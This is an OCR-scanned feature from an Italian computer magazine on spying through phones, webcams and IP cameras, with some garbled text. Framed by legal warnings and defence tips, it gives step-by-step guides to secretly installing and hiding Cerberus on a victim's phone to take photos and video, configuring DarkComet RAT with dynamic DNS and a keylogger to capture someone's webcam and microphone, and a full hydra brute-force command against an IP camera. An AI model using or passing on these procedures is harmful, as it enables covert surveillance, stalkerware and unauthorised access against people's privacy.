di applicazioni Web e viene distribuita come 
un'applicazione per la tecnologia di virtualiz- 


zazione VMWare (www.vmware.com). Si scarica 
come un archivio ZIP di 3,11 GB (https://source- 
forge.net/projects/samurai) da decomprimere 
e poi caricare su VMWare. 

Tra tutte quelle esaminate, la Santoku Linux 
appare la distribuzione di sicurezza più com¬ 
pleta. La distro è scaricabile come un file ISO 
da 2,36 GB (https://sourceforge.net/projects/ 
santoku) e, come le altre, non richiede di essere 
installata sul disco fisso ma può essere ese¬ 
guita in modalità live direttamente dal DVD. 
A differenza delle altre, oltre ad offrire un cam¬ 
pionario di strumenti per l'esperto di sicurezza 


veramente completo, la Santoku presenta 
anche alcuni tutorial e guide molto utili per chi 
muove i primi passi nel settore del penetration 
Test. Anche la distribuzione Parrot OS (https:// 
sourceforge.net/projects/parrotsecurity) può 
essere avviata direttamente dal DVD o instal¬ 
lata sul disco rigido. Per accedere all'ambiente 
utilizziamo l'account"root"e la password"toor". 
Una volta loggati, abbiamo accesso agli stru¬ 
menti di sicurezza tipici di queste distribuzioni 
e, se vogliamo, possiamo installare Parrot sul 
disco semplicemente cliccando sull'icona del 
desktop. 



Samurai è una distribuzione che permette di testare le 
applicazioni Web. Funziona con VMWare. 



Sound & Video 

System Tools 
Preferences 

Run 

Logout 


| Development Tools 
> ■ Device Forensics 
, M Penetration Testing 
, ■m Reverse Engineering 
■ Wireless Analyzers 
© Help 
Q Tutorials 

aBniMntar 


La distro Santoku è dedicata ai neofiti dei test di 
sicurezza in quanto comprende dei tutorial pratici. 



Parrot, una distribuzione per il penetration test 
funzionale ed efficace. 
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Fai da te | Così ti spio dallo smartphone | 


Così ti spio da 

cellulare e webcam 


Un pirata si confessa e ci svela come in pochi passi riesce 
ad entrare in un telefonino e catturare foto, video e audio 


B ig brother is watching you... La più 
famosa premonizione del romanzo 
"1984” di George Orwell si è tramutata, 
mai come ora, in una triste realtà. A spiarci 
non è di certo nostro fratello, ma una miriade 
di malintenzionati e pirati pronti a ficcare 
il naso nella nostra vita privata. A molti ciò 
non sembrerà per nulla una novità: diverse 
volte in passato, infatti, abbiamo puntato i 
riflettori sui pericoli ai quali la nostra priva¬ 
cy è sottoposta. Software capaci di rubarci 
l’identità virtuale o di accedere ai nostri file 
più importanti sono (purtroppo) all’ordine 
del giorno. Ma invece che migliorare, la si¬ 
tuazione peggiora e i pirati si allineano con 
i passi in avanti compiuti dalla tecnologia. 

Nuovi dispositivi, 
nuovi attacchi 

A nuovi device e ai loro numerosi accessori si 
affiancano tecniche di violazione deliavita 
privata sempre più sofisticate. Un esempio? 


Concentriamoci per un attimo sugli smar¬ 
tphone. Molti di noi sapranno già che c'è 
chi riesce ad intrufolarsi nelle nostre con¬ 
versazioni WhatsApp o nella nostra rubrica 
telefonica. Ma chi avrebbe mai pensato che 
i pirati fossero capaci anche di attivare da 
remoto la fotocamera e spiarci (nel senso 
letterale del termine)? Focalizziamoci ora 
sulle Webcam. Anche se non l'avremmo mai 
immaginato, mentre stiamo guardando il 
monitor, leggendo le notizie di una pagina 
Web o spulciando le bacheche Faceboolc 
dei nostri amici, ci potrebbe essere qual¬ 
cuno che ci controlla direttamente da que¬ 
sto piccolo e solo apparentemente innocuo 
occhio elettronico, senza che il LED della 
stessa sia attivo. In definitiva, smartphone, 
tablet, Webcam e IPCam si sono trasformati 
inveri e propri spioncini di una porta dietro 
la quale si nasconde gente senza scrupoli e 
che non ha niente di meglio da fare che farsi 
gli affari nostri! 


ATTENZIONE!!! 

Ricordiamo che violare 
le reti altrui è un 
reato perseguibile 
penalmente dalla 
legge italiana (art. 
615-ter del codice 
penale). 

Le procedure da 
noi descritte, pertanto, devono essere 
utilizzate esclusivamente al fine di 
testare la sicurezza della propria 
rete locale Wi-Fi e, intervenendo 
sulle impostazioni dei dispositivi, 
renderla invulnerabile a qualsiasi 
attacco esterno. 



ECCO COME ABBIAMO SIMULATO UN ATTACCO 
Al NOSTRI DISPOSITIVI 


Premettiamo che tutte le tecniche descritte 
in questa inchiesta sono state applicate 
a dispositivi di nostra proprietà connessi 
ad una rete locale appositamente allestita 
nei nostri laboratori. Nello specifico, ab¬ 
biamo voluto mettere in pratica tutte le 
tecniche (inizialmente solo teoriche) che 
ci permettono di accedere da remoto ad 
ogni dispositivo capace di acquisire imma¬ 
gini: Webcam, fotocamere integrate negli 
smartphone, reflex, digicam e IPCam.Tutto 
questo per capire realmente a quali rischi 
siamo quotidianamente sottoposti. Come 
avremo modo di scoprire, nel caso delle 
fotocamere presenti su smartphone e tablet 
Android ci siamo affidati ad una specifica 
app e il test è stato eseguito su reti com¬ 


pletamente differenti: il telefonino è stato 
connesso alla rete 3G/4G, mentre il PC dal 
quale abbiamo effettuato il telecontrollo 
era connesso tramite un hotspot Wi-Fi. Per 
la Webcam e liPCam, al contrario, abbiamo 
effettuato un test nella nostra rete locale: 
l'IPCam, così come il PC equipaggiato con 
la Webcam, erano connessi alla stessa rete 
senza fili del computer dal quale abbia¬ 
mo sferrato l'attacco. Ciò, essenzialmente 
per comodità e rapidità di esecuzione. I 
risultati? Come avremo modo di scoprire 
nelle pagine seguenti sono davvero scon¬ 
certanti. Per ora, preferiamo consigliare a 
tutti i nostri lettori di evitare di far utilizzare 
il proprio PC, smartphone e tablet ad amici, 
colleghi o, peggio ancora, estranei: ad un 


malintenzionato bastano pochi secondi 
per spiarci per tutto il resto della vita! Per le 
IPCam, poi, meglio impostare password 
di accesso molto robuste, decisamente 
lunghe e nelle quali sono presenti 
combinazioni di lettere, numeri e 
caratteri speciali. E se anche tu 
sei curioso di testare le tecniche 
descritte in quest'inchiesta, sei 
libero di farlo. Ma solo su 
dispositivi di tua proprie¬ 
tà. Non dimentichiamo, 
infatti, che violare la 
privacy altrui è un 
reato perseguito 
penalmente dalla 
legge italiana! 


/ 
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SMARTPHONE 

Un semplice antifurto per 
smartphone come Cerberus 
può consentire ad un 
malintenzionato di spiarci 
attraverso la fotocamera del 
dispositivo 


SMART TV 

Sembrerà incredibile, ma anche 
i sistemi di riconoscimento 
vocale e le webcam integrate 
nei televisori possono 
trasformarsi in spioncini sulla 
nostra vita privata 


REFLEX/DIGICAM 

Dietro ad ogni immagine digitale si nascondono 
dati segreti che possono rivelarci l’esatta posizione 
da cui è partito il clic. Ecco come scoprirlo 


IPCAM 

Vengono usate per sorvegliare 
casa, ma non sempre sono 
sicure. Ecco come un estraneo 
potrebbe violare la nostra 
privacy 


WEBCAM 

Con i software giusti c’è chi 
riesce a controllare da remoto la 
videocamera del PC e ascoltare 
tutto ciò che passa dal microfono 


WEBCAM E ASCOLTA QUEL CHE DICIAMO 


LA TV CI SPIA DALLA 

Permettono di collegarsi a Internet per navigare 
rimanendo comodamente seduti sul divano 
di casa e, come uno smartphone o un tablet, 
offrono la possibilità di installare decine di app 
per aggiungere nuove funzioni o trasformarle 
in divertenti console di gioco: stiamo parlando, 
ovviamente, delle Smart TV, sempre più diffuse 
nei salotti degli italiani. Proprio alcune di queste 
funzioni, però, possono rappresentare un serio 
pericolo per la nostra privacy. È storia di questi 
giorni la notizia secondo la quale i sistemi di 
riconoscimento vocale e le Webcam integrate 
nelle Smart TV Samsung hanno il brutto vizio di 
trasmettere in chiaro verso server remoto tutti i 
suoni e le immagini che riprendono nell'ambien¬ 


te circostante. Samsung ovviamente è subito 
corsa ai ripari, promettendo un aggiornamento 
del sistema operativo installato nei suoi televi¬ 
sori che permette di criptare tutti questi dati. Per 


saperne di più, scarica da Win Extra l'inchiesta 
che abbiamo dedicato proprio a questa pro¬ 
blematica. Vi terremo aggiornati sull'evolversi 
della faccenda nei prossimi numeri. 


•.. . . G .9.. .k. J.y.y.5. •■?...$ . 

.2...* .y.. .0.2.#. 
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«song..prompt.. . 

resuTt.for mat.,rec_text_resulti . 
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IL KIT DEL PERFETTO SPIONE INFORMATICO 


APP PER CONTROLLO REMOTO 

CERBERUS ANTIFURTO 

Nasce come antifurto, 
ma nelle mani di un 
malintenzionato 
» un 

» potente strumento 
per controllare 
da remoto lo 
smartphone, 
registrare le nostre 

conversazioni, attivare la fotocamera e 
sbirciare nella rubrica telefonica! 


TOOL DI ACCESSO REMOTO 



DARKCOMET RAT 
LEGACY 

Permette di 
attivare da 
remoto, e senza il 
nostro consenso, 
la Webcam 
installata nel 
computer. Una volta 
preso il controllo, può accenderla in 
ogni momento per registrare tutto ciò 
che accade in casa nostra. 


DISTRIBUZIONE LINUX 



KALI LINUX 1 . 1.0 

È un sistema operativo 
all'uso con 

tutte le principali 
applicazioni 
preferite dai 
pirati. Tra queste 
c’è Hydra, un tool 
specializzato che permette di portare a 
termine un attacco di tipo brute force 
basato su dizionario di password. 


EDITOR DATI EXIF 



JEFFREY’S EXIF VIEWER 

È un servizio on-line 
che permette di 
analizzate i dati 
EXIF associati a 
tutte le immagini 
scattare con una 
fotocamera digitale. 
In pochi secondi è 
in grado di rivelarci anche l’esatta 
posizione geografica in cui la foto è 
stata scattata! 
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C* Così fa Thacker 


Faldate | Ti spio dallo smartphone | 


Così ti sbircio 
dal tuo telefonino! 


Usando l’app Cerberus per Android possiamo 
origliare le conversazioni delle nostre vittime 
e scoprire il luogo in cui si trovano 


U n telefonino o un tablet lasciato in¬ 
custodito per qualche minuto è una 
manna dal cielo per chi vuole spiarci. 
Non tanto perché così ha la possibilità di 
sbirciare nella nostra rubrica telefonica, 
fra gli SMS e le conversazioni WhatsApp, 
ma perché può installare un’applicazione 
che gli consente di farlo tutte le volte che 
vuole, ovunque lui sia. E tramite la stessa 
applicazione potrà anche ascoltare ciò 
che stiamo dicendo al telefono, attivare 
la fotocamera frontale o posteriore e scat¬ 


tarci una foto o registrare direttamente un 
filmato. Il tutto, senza che noi possiamo 
accorgercene. L'applicazione in questione 
si chiama Cerberus che nasce con scopi 
ben più nobili ma, come al solito, i pirati 
hanno trovato un metodo per farne usi 
illegali. E se pensiamo che controllare 
l’elenco delle applicazioni installate possa 
metterci al riparo ci sbagliamo di grosso: 
dopo essere stata installata, Cerberus è 
come un fantasma nascosto nel nostro 
smartphone! 


PROTEGGITI COSÌ 

Non c’è niente di più personale di uno 
smartphone ed è quindi importante 
proteggerlo al meglio per evitare che 
qualcuno possa intrufolarsi nella no¬ 
stra vita privata. Ecco le dritte giuste 

per mettere al sicuro i vari dispositivi: 

• Non lasciare mai incustodito il proprio smartpho¬ 
ne, soprattutto nei locali pubblici. 

• Impostare sempre una procedura di blocco della 
schermata di Home. 

• Non installare mai app sconosciute o verificate, 
anche se scaricate dagli store ufficiali. 

• Controllare periodicamente l'elenco delle app 
installate per individuare quelle sospette. 

• Installare un buon antivirus in grado di monitorare 
anche le app in esecuzione. 



13 Installiamo la spia nel cellulare 

Sul telefono della nostra vittima designata dobbiamo configurare un’app spiona che ci permette di controllare 
il dispositivo da remoto. Vestiamo quindi i panni di un malintenzionato e “impicciamoci” dei fatti altrui. 


£% £ Q 

v ▼ • 19:30 

Crea un account Cerberus 

Scegli un nome utente: 




Scegli una password. 

1 Minimo 4 caratteri Questa pas 

sword verrà usata per I 

| accedere alla configurazione e 

per controllare il tuo 



PASSWORD 


Cambia password 

Cambia parola chiave comandi SMS 

Usa questa opzione se vuoi personalizzare la 
prima parola dei comandi SMS. Default 
'cerberus* 



Cambia codice chiamata 


^ II finto antifurto 

Verifichiamo che lo smartphone o il tablet 
Android da controllare sia connesso a Inter¬ 
net (tramite la rete 3G/4G o un hotspot Wi-Fi): acce¬ 
diamo al Play Store, cerchiamo l’app Cerberus anti¬ 
furto e installiamola. Al primo avvio tappiamo sul pul¬ 
sante Crea un account Cerberus. 


Username e password 

Scegliamo un nome utente, una password e 
forniamo un indirizzo e-mail valido: useremo 
poi questi dati per controllare il dispositivo anche da 
remoto. Confermiamo con Crea account. Accettiamo 
le condizioni d’uso e tappiamo nuovamente su Crea 
account per completare la procedura. 


C’è, ma non si vede! 

Dall’interfaccia principale dell’app tappiamo 
sulle tre lineette orizzontali poste in alto a 
sinistra per accedere al Main menu. Dal menu Con¬ 
figurazione p/rópafe tappiamo Password e attivia¬ 
mo l'opzione Nascondi dalla lista applicazioni per 
nascondere l’app fra quelle installate! 
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Ti spio dallo smartphone | Fai da te 


Così fa l'hacker O 



Siamo pronti per spiare 


Ora che abbiamo installato Cerberus sul telefonino o sul tablet Android della nostra “vittima”, 
possiamo divertirci a controllarla da remoto senza che se ne accorga! Ecco come procedere. 



Usemame vmeosennno 


Password ~»*H 

Log in 





Si controlla dal Web 

Grazie alla comoda interfaccia Web, il device può essere con¬ 
trollato da qualsiasi PC connesso ad Internet. Raggiungiamo 
la pagina Web www.cerberusapp.com e compiliamo i campi User- 
name e Password con i dati scelti al Passo A3. Confermiamo con 
un clic sul pulsante Log in. 


2 


Scattiamo una foto 

Appare così l’interfaccia di controllo remoto di Cerberus. Dal 
menu a tendina Dispositivo è possibile selezionare il tablet 
o lo smartphone da controllare (nel caso ce ne sia configurato più 
di uno). Spostiamoci in Comando e da qui selezioniamo l’opzione 
Scatta foto. 



^ Fotocamera frontale o posteriore? 

2 Proprio sotto la voce Comando appaiono delle nuove opzio¬ 
ni: selezioniamo la voce Scatta foto immediatamente. 
Come impostazione predefinita, verrà usata la fotocamera frontale: 
se vogliamo usare quella principale, spuntiamo Usa camera poste¬ 
riore. Confermiamo con Invia comando. 




Immagini via e-mail 


^ Affinché tutto vada per il verso giusto è necessario che il 
dispositivo controllato sia connesso al Web. Accediamo alla 
casella di posta indicata al Passo A3 e verifichiamo l’arrivo di un nuo¬ 
vo messaggio: in allegato troveremo la foto catturata di nascosto con 
la nostra vittima (nel nostro caso un collega intento nel suo lavoro)! 




-x E se voglio un video? 

Se vogliamo registrare un video, selezioniamo Cattura video 
(da Comando) dall'interfaccia Web di Cerberus. Anche in 
questo caso possiamo scegliere se usare la fotocamera frontale o 
posteriore. Impostiamo la durata del video (massimo 30 secondi) e 
confermiamo con Invia comando. 


Non hai più segreti! 

0 Al termine della registrazione, il video verrà inviato in allega¬ 
to ad un messaggio di posta elettronica (proprio come nel 
caso della foto). Il formato di registrazione è ,3gp e la qualità dipen¬ 
de, per ovvie ragioni, dalla fotocamera installata nello smartphone o 
tablet spiato. 



5 EURO E LA USI 
PER SEMPRE! 

Come abbiamo scoper¬ 
to, Cerberus è scaricabi¬ 
le dal Play Store di An- 
droid senza spendere un 
solo centesimo. Ciò non 
vuol dire, però, che l'uti¬ 
lizzo dell'app sia gra¬ 
tuito per sempre. Già, 
perché gli sviluppatori 
diCerberusconsentono 
agli utenti di provare 
liberamente l'app per 7 
giorni, trascorsi i quali 
è necessario procedere 
all'acquisto di una licen¬ 
za d'uso. Quanto cosa? 
Per fortuna, solo pochi 
spiccioli: con 4,99 euro 
è possibile utilizzare a 
vita Cerberus e instal¬ 
larla su 3 differenti di¬ 
spositivi. Il pagamento 
avviene direttamente 
all'Interno dell'app tra¬ 
mite PayPal. 


I CLIENT PER 

ANDROIDE 

IPHONE 


Il telefonino o il tablet 
Android "spiato" può es¬ 
sere controllato non so¬ 
lo tramite l'interfaccia 
Web (e quindi da qual¬ 
siasi PC connesso al Web 
presente sulla faccia 
della Terra) ma anche 
da un altro smartphone 
Android oiPhone. Gli 
sviluppatori di Cerberus 
hanno infatti rilasciato 
dei dient ufficiali e gra¬ 
tuiti (disponibili su Play 
Store e App Store ) che ci 
permettono di gestire 
il controllo remoto più 
comodamente anche 
quando non siamo da¬ 
vanti al PC. 
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C* Così fa Thacker 


Fai da te | Ti spio dalla Webcam 


La Webcam del PC 
ti spia da remoto 


Con i software giusti possiamo controllare 
la videocamera dei PC altrui e ascoltare 
tutto ciò che viene captato dal microfono 


O rmai tutti i notebook in circolazione 
sono equipaggiati con una Webcam 
integrata che ci permette di avviare 
una videochiamata e sentirci così più vi¬ 
cini ad amici, parenti e colleghi d’ufficio. 
Ma anche più spiati da pirati e malinten¬ 
zionati! Già, perché anche se sembra as¬ 
surdo, c’è chi riesce ad attivare, da remoto 
e senza il nostro consenso, la Webcam 
installata nel nostro computer. E la faci¬ 
lità con la quale è possibile raggiungere 
l’obiettivo lascia chiunque senza parole, 


a tal punto che i più paurosi potrebbero 
aver già deciso di coprire l'obiettivo della 
Webcam stessa con un pezzo di nastro 
isolante nero! Una soluzione sicuramente 
efficace e semplice da mettere in pratica, 
ma forse un po’ esagerata, come scoprire¬ 
mo più avanti: esistono infatti dei metodi 
meno rudimentali che ci consentono di 
dormire sonni tranquilli nella certezza 
che nessuno ci stia spiando. Ma per i più 
scettici, abbiamo deciso di passare dalla 
teoria alla pratica. 


PROTEGGITI COSÌ! 

Con alcuni semplici accorgimenti 
possiamo evitare che qualche ma¬ 
lintenzionato sfrutti la Webcam del 
computer per intrufolarsi nella nostra 
vita privata: 

• Se la Webcam è USB, scolleghiamola quando 
non serve. 

• Teniamo sempre sotto controllo il LED di fun¬ 
zionamento e verifichiamo che non sia acceso. 

• Verifichiamo che tra i processi in esecuzione 
nel sistema non ci siano quelli che gestiscono 
la Webcam. 

• Se proprio non abbiamo modo di disattivare la 
Webcam, usiamo del nastro adesivo nero per 
coprire l'obiettivo. 

• Eseguiamo i punti precedenti anche per disabi¬ 
litare il microfono collegato al PC. 



13 Procuriamoci tutto l’occorrente per 

La squadra attrezzata per sbirciare dalle Webcam altrui ha già tutti i software utili per prenderne il controllo: deve 
solo trovare il modo di installarli sul PC della vittima e configurare i DNS per renderlo sempre raggiungibile. 



Un nuovo dominio 

Per far sì che il PC dello spione (quindi quello 
installato nel nostro laboratorio) sia raggiun¬ 
gibile anche da remoto è necessario usare un servizio 
di DNS dinamico. Da www.no-ip.com clicchiamo Sign 
Up e completiamo la registrazione guidata. Annotia¬ 
mo il nome scelto (ad esempio, dominio.no-ip.org). 


Il giusto software 

È il momento di agire sul computer da “spia¬ 
re”. Dal DVD allegato alla rivista prelevia¬ 
mo il software Simple Port Forwarding e awiamone 
l'installazione. Clicchiamo sul pulsante Nexttìno al 
termine della procedura. Non ci resta che preme¬ 
re su Finish. 


^ Una porta sempre aperta 

2 Awiamo Simple Port Forwarding. Spostia¬ 
moci nel menu File e da qui clicchiamo sul 
pulsante Aggiungi porte. Nella nuova schermata che 
appare, scegliamo Aggiungi personale: digitiamo 
un Nome identificativo e compiliamo il campo Porta 
Finale con 1604. Confermiamo con Aggiungi. 
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Ti spio dalla Webcam | Fai da te 


Così fa l'hacker O 


L’occhio digitale entra in funzione 

Per spiare la vittima abbiamo installato sul nostro PC il server DarkComet RAT Legacy (diverso dalla versione 
Module): bastano quindi pochi clic per attivare da remoto la Webcam e il microfono collegati al suo PC! 



^ Ti spio quando voglio 

Avviamo DarkComet RAT Legacy e connettia¬ 
moci al PC spiato cliccando DarkComet-RAT 
(in alto a sinistra). Scegliamo Listen to newporte 
cucchiamo Listen per connetterci. In SpyFunctionse 
attiviamo la Webcam da remoto! Dal menu che appare 
facciamo doppio clic su Webcam Capture. 


jk Ecco le immagini! 

2 Ci ritroveremo così nella schermata di impo¬ 
stazione della Webcam. Selezionata la perife¬ 
rica, clicchiamo Start Capture. Immediatamente Dark 
Comet RAT Module inizierà a trasmettere le immagi¬ 
ni catturate dalla Webcam della vittima al DarkComet 
Legacy installato sul PC del nostro laboratorio! 


C’è anche l’audio 

Il software spia è in grado di mostrarci non 
solo le immagini riprese di nascosto dalla 
Webcam, ma anche i suoni presenti nell’area circo¬ 
stante al computer spiato. Per fare ciò, effettuiamo un 
doppio clic su Sound Capture (lasciando invariate le 
impostazioni mostrate) e confermiamo con Capture. 


spiare dalla Webcam del notebook 


Setup DarkComet RAT Modi 



Ptewe re od (he MovMng mportant riformatori bcforc contrvng. 



e 1 icaot f» agreement 


When 



Password : 

||| Display ID : Guestl6 

•J Acfcve offline keytogger dtmg this sessKxi 


8 

& 

G 


Remote IP 


V5.4.0 


G About 


Settmgs 


O Actìve 


) DarkComet RAT Legacy - Settmgs 


:_</ On dose minoro ze appheaton to tray. 

[7 Start thè appteabon wtth Windows. 

[ 7 Automa beali y actrve control on program star top. 

V Fine i 


-à. La spia nel PC 

4 Superata questa fase, passiamo all’installazione di DarkComet RAT Modu¬ 
le, il software che ci permetterà di “spiare” dalla Webcam del PC anche 
da remoto. Preleviamolo dalla sezione Antivirus&Sicurezza del Win DVD-Rom e 
installiamolo: clicchiamo Nexte terminiamo con Finish. 


^ Configurazione lampo! 

Avviamo DarkComet RAT Module e nel campo IP/DNS inseriamo il domi¬ 
nio registrato al Passo Al. Compiliamo Porfcon 1604 e spuntiamo Acti- 
ve off line keylogger during this session. Premiamo Settings, attiviamo le opzioni 
presenti e terminiamo prima con Fine e poi con Active. 
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C* Così fa Thacker 


| Software | Ti spio dalla IPCam 


Le IPCam vengono usate per sorvegliare la casa ma non sempre sono 

sicure. Ecco come un estraneo potrebbe violare la nostra privacy 


Ti sorveglio 
o ti spio? 


L e IPCam sono delle speciali telecamere 
capaci di condividere le immagini ri¬ 
prese e avvisarci se qualcuno attraversa 
l’area videosorvegliata: basta posizionarle 
nella zona da riprendere, connetterle alla 
rete Wi-Fi e sono già operative. Da qualsiasi 
PC connesso in locale (o da remoto, previa 



configurazione di un DNS dinamico: scopri 
come a pagina 26 ), basta avviare il browser, 
connettersi alla rete e raggiungere l'indirizzo 
dell’IPCam per vedere le immagini riprese. 
Ciò lascerebbe pensare che nessuno, oltre a 
noi, sia in grado di spiare dalla nostra IPCam. 


Ma non è così... 
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Affidiamoci a Linux! 

Dal DVD allegato alla rivista scarichiamo 
l’archivio compresso KaliLinux.zip. Scom¬ 
pattiamolo e salviamo in una qualsiasi car¬ 
tella deH’hard disk l'immagine in formato ISO della 
distribuzione Kali Linux, disponibile sia a 32 bit sia 
a 64 bit. 




In locale o da remoto? 


a Appare così il desktop di Kali Linux. Abbia¬ 
mo supposto che il PC attaccante si fosse 
già intrufolato nella LAN della IPCam o che 
si fosse a conoscenza dell’IP del dispositivo. Abbia¬ 
mo quindi avviato il browser e raggiunto l’interfaccia 
grafica del router per scoprire l’IP della telecamera. 


Masterizziamo la distro 

Raggiungiamo quindi il percorso nel quale 
abbiamo salvato la ISO, selezioniamola con 
un clic del tasto destro del mouse e spo¬ 
stiamoci su Apri con. Selezioniamo Masterizzatore 
immagini disco di Windows, inseriamo un DVD 
vergine nel masterizzatore e avviamo la scrittura. 



Basta un comando 

a Possiamo ora sferrare l'attacco brute force: 
avviamo il terminale (Ctrl+Alt+T)e diamo il 
comando hydra -ladmin -P/root/Desktop/ 
dizionario.txt -e ns -f-V 192.168.0.128 http-get 
/. Il file Dizionario.txtè l'elenco delle potenziali pas¬ 
sword; 192.168.0.128 è l'indirizzo della IPCam. 


PROTEGGITI COSI 

t Basta seguire poche e semplici regole 
per mettere al riparo da ogni tipo di 
attacco informatico il nostro sistema 
di videosorveglianza: 

• Modifichiamo sempre la password predefinita di 
accesso al router. 

• Per proteggere l'accesso all'IPCam usiamo pass¬ 
word robuste composte da almeno 8 caratteri 
misti alfanumerici e simbolici. Renderemo così 
più complesso da portare a termine un attacco 
di tipo brute force basato su dizionario password. 
• È bene configurare un firewall per impedire accessi 
indesiderati dall'esterno alla nostra rete locale. 

• Configuriamo regole di accesso alla LAN filtrando 
dal router anche il MAC Address della IPCam. 


KM wm 


Boot acini 
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Avviamo il PC da DVD 

Riavviamo il PC e accediamo al BIOS (pre¬ 
mendo Cane all’avvio): settiamo il boot da 
DVD (la procedura varia in base al modello 
di scheda madre). Con il disco di Kali Linux inserito 
nel lettore, attendiamo che appaia l’interfaccia di 
boot. Selezioniamo Live (686-pae) e diamo Invio. 



L’IPCam è stata bucata! 


a Kali Linux si mette alla ricerca della password. 
Scovata la chiave d’accesso, verrà mostra¬ 
ta direttamente nel terminale evidenziata in 
verde. Non ci resta che ritornare al browser, rag¬ 
giungere l’indirizzo deH'IPCam e digitare la chiave 
d’accesso per vedere le immagini live! 
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Ti spio dalla fotocamera | Software 


Così fa l'hacker C 


Ecco cosa abbiamo scoperto analizzando le immagini digitali 

catturate con le nuove reflex e diqicam dotate di modulo GPS 


I tuoi segreti 
in una foto 


M olte delle fotocamere reflex e com¬ 
patte di nuova generazione integra¬ 
no un modulo GPS che consente di 
geolocalizzare gli scatti. Ma dove vengono 
salvati i dati relativi alla nostra posizione? 
Negli EXIF, ovvero quei metadati che viag¬ 
giano in accoppiata con la foto. Sembrano 
nascosti, ma basta usare specifici tool per 
visualizzarli. Al loro interno, oltre alle co¬ 


ordinate geografiche dello scatto, possiamo 
visualizzarne anche la data e l’ora. Se siamo 
in possesso di una fotocamera con GPS inte¬ 
grato, stiamo dunque bene attenti a ciò che 
condividiamo sul Web: ad un malintenzio¬ 
nato basta infatti scaricare la foto condivisa 
e analizzarne gli EXIF per scoprire in pochi 
secondi dove l’abbiamo realizzata (e dunque, 
dove siamo stati)! 




Il tool che spia gli scatti digitali 

Da un PC connesso a Internet colleghiamo- 
I ci a www.winmagazine.it/link/3030: èdaqui 
che possiamo analizzare i dati EXIF di uno 
scatto scaricato dal Web o presente nel PC. Clicchia- 
mo Scegli file e raggiungiamo il percorso nel quale 
è presente lo scatto. Confermiamo con Apri. 


Alla faccia della privacy 

a Aspettiamo una manciatadi secondi (neces¬ 
sari per il caricamento del file) prima di veder 
apparire tutti i dati che si nascondono dietro 
la foto. Oltre ai dati tecnici di scatto, se la foto è 
geolocalizzata nella sezione Location appaiono le 
relative coordinate geografiche. 


PROTEGGITI COSÌ 

t Usando alcune accortezze possiamo 
condividere le nostre foto su Internet 
senza timore di rilevare alcuna infor¬ 
mazione personale: 

• Quando scattiamo una foto che pensiamo di 
condividere ad esempio sui social network, ri¬ 
cordiamoci di disattivare il modulo GPS della 
fotocamera e la memorizzazione dei dati di 
geolocalizzazione. 

• Prima di pubblicare l'immagine, cancelliamo i dati 
EXIF contenenti informazioni sensibili. 

• Condividendo una fotografia su Internet disabi¬ 
litiamo la funzione di download, sempre che il 
servizio on-line lo consenta. 

• Possiamo anche pubblicare i dati EXIF delle fo¬ 
to, ma almeno evitiamo di farlo per quelle più 
personali. 



ri trovo sulla mappa! 

a In Location guessed from coordinatesi ie¬ 
ne mostrato il punto esatto (o leggermente 
approssimativo, molto dipende dalla qualità 
del modulo GPS utilizzato) dal quale è partito lo scat¬ 
to. Cucchiamo sul link Google per vedere sulla car¬ 
tografia di Maps l'indirizzo segnalato. 


FOTOCAMERE CON WI-FI INTEGRATO NEL MIRINO DEI PIRATI 

Le fotocamere digitali reflex, mirrorless e compatte si fanno sempre più accessoriate. 

E oltre ad effetti integrati, GPS e chi più ne ha più ne metta, i modelli più evoluti inte¬ 
grano anche la connettività Wi-Fi. Per altre ancora, invece, sono disponibili accessori 
che consentono la comunicazione wireless con specifiche applicazioni mobile o 
PC. L'utilità? Riuscire a trasferire più comodamente foto e filmati. Peccato, però, che 
dove c'è una rete senza fili, quasi sempre c'è anche un pirata pronto a lanciare il suo 
amo in attesa che qualche pesce abbocchi. C'è chi, infatti, è riuscito a bypassare 
la sicurezza delle reti Wi-Fi ad hoc che le fotocamere con Wi-Fi integrato creano. 

Interponendosi fra fotocamera e dispositivo ricevente (uno smartphone, un tablet 
o un PC) per alcuni è stato possibile sniffare tutti i dati in transito. In parole povere, i 
pirati riescono a rubare le foto in trasferimento! Per fare ciò bastano programmi del 
calibro di Cain & Abel, software specifici per attacchi di tipo Man in thè middle (nel 
quale, appunto, l'attaccante si interpone fra due dispositivi che comunicano fra loro). 
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Arriva il virus 
che spia tutti 


Su Internet sta infuriando una guerra 
cibernetica. Il pericolo si chiama Regin, 
un supertrojan che da anni spia governi 
e industrie. Vediamo di cosa si tratta 



EDDYWILLEMS 

Esperto sicurezza 
di G Data 


Regin mira ad impadronirsi 
del controllo remoto e della 
supervisione dei dati in tutti 
i settori 


n 


U no spettacolare caso di spionaggio 
cibernetico sta creando molto scompi¬ 
glio in Rete: stiamo parlando del pro¬ 
gramma “Regin", un supertrojan che riesce a 
camuffarsi a regola d'arte e ad attuare alcuni 
odiosi stratagemmi. Regin si distingue infatti 
da tutte le altre minacce virali per il fatto di 
essere molto difficile da identificare e di 
permettere di compiere attacchi informatici 
evoluti a danno di governi, aziende e privati. 

I punti di forza di Regin 

Questa nuova superarma dei servizi segreti 
è pericolosa per tre motivi. Anzitutto si basa 
su un sistema modulare: questo significa 
che gli ideatori possono "confezionarsi" 
il virus ad hoc ed effettuare operazioni di 
spionaggio sui computer delle vittime per 
carpire password, scattare foto delle videate 
del computer, tenere sotto controllo il flusso 
dei dati, ripristinare materiale cancellato 
ecc. In secondo luogo i criminali indirizzano 
i malcapitati verso pagine Internet infette 
dove verrà "iniettato" il codice fraudolento. 
Se ad esempio la vittima avvia una richiesta di 


ricerca, questa viene intercettata e provvede 
a richiamare una versione contraffatta del 
motore di ricerca contenente il virus, senza 
che le vittime si accorgano minimamente 
dell'infezione in atto. La terza caratteristica 
di Reginè che il trojan agisce per lungo tem¬ 
po in estrema segretezza dal momento che 
la sua struttura modulare ne rende molto 
complesso lo smascheramento. Il virus infatti, 
oltre a cancellare le proprie tracce in modo 
permanente, è costituito da un codice per la 
maggior parte criptato che ne rende difficile 
l'individuazione. Il trojan inoltre, completo 
di tutti i suoi moduli, richiede uno spazio di 
appena 20 Megabyte. I criminali, infine, rie¬ 
scono a gestire il fastidioso spione attraverso 
una connessione Internet criptata così da 
lavorare senza dare nell'occhio. 

Una virulenza senza pari 

I moduli “su misura” di Regin consentono 
di sferrare attacchi spyware particolarmente 
distruttivi. Gli esperti della sicurezza hanno 
scoperto, ad esempio, un'espansione del 
trojan su un computer dell’azienda di tele¬ 
comunicazioni belga Belgacom che tene¬ 
va sotto controllo le centraline di telefonia 
mobile. I pirati erano riusciti a intercettare 
informazioni telefoniche e dati dalle cellule 
delle connessioni mobile, a selezionarli e 
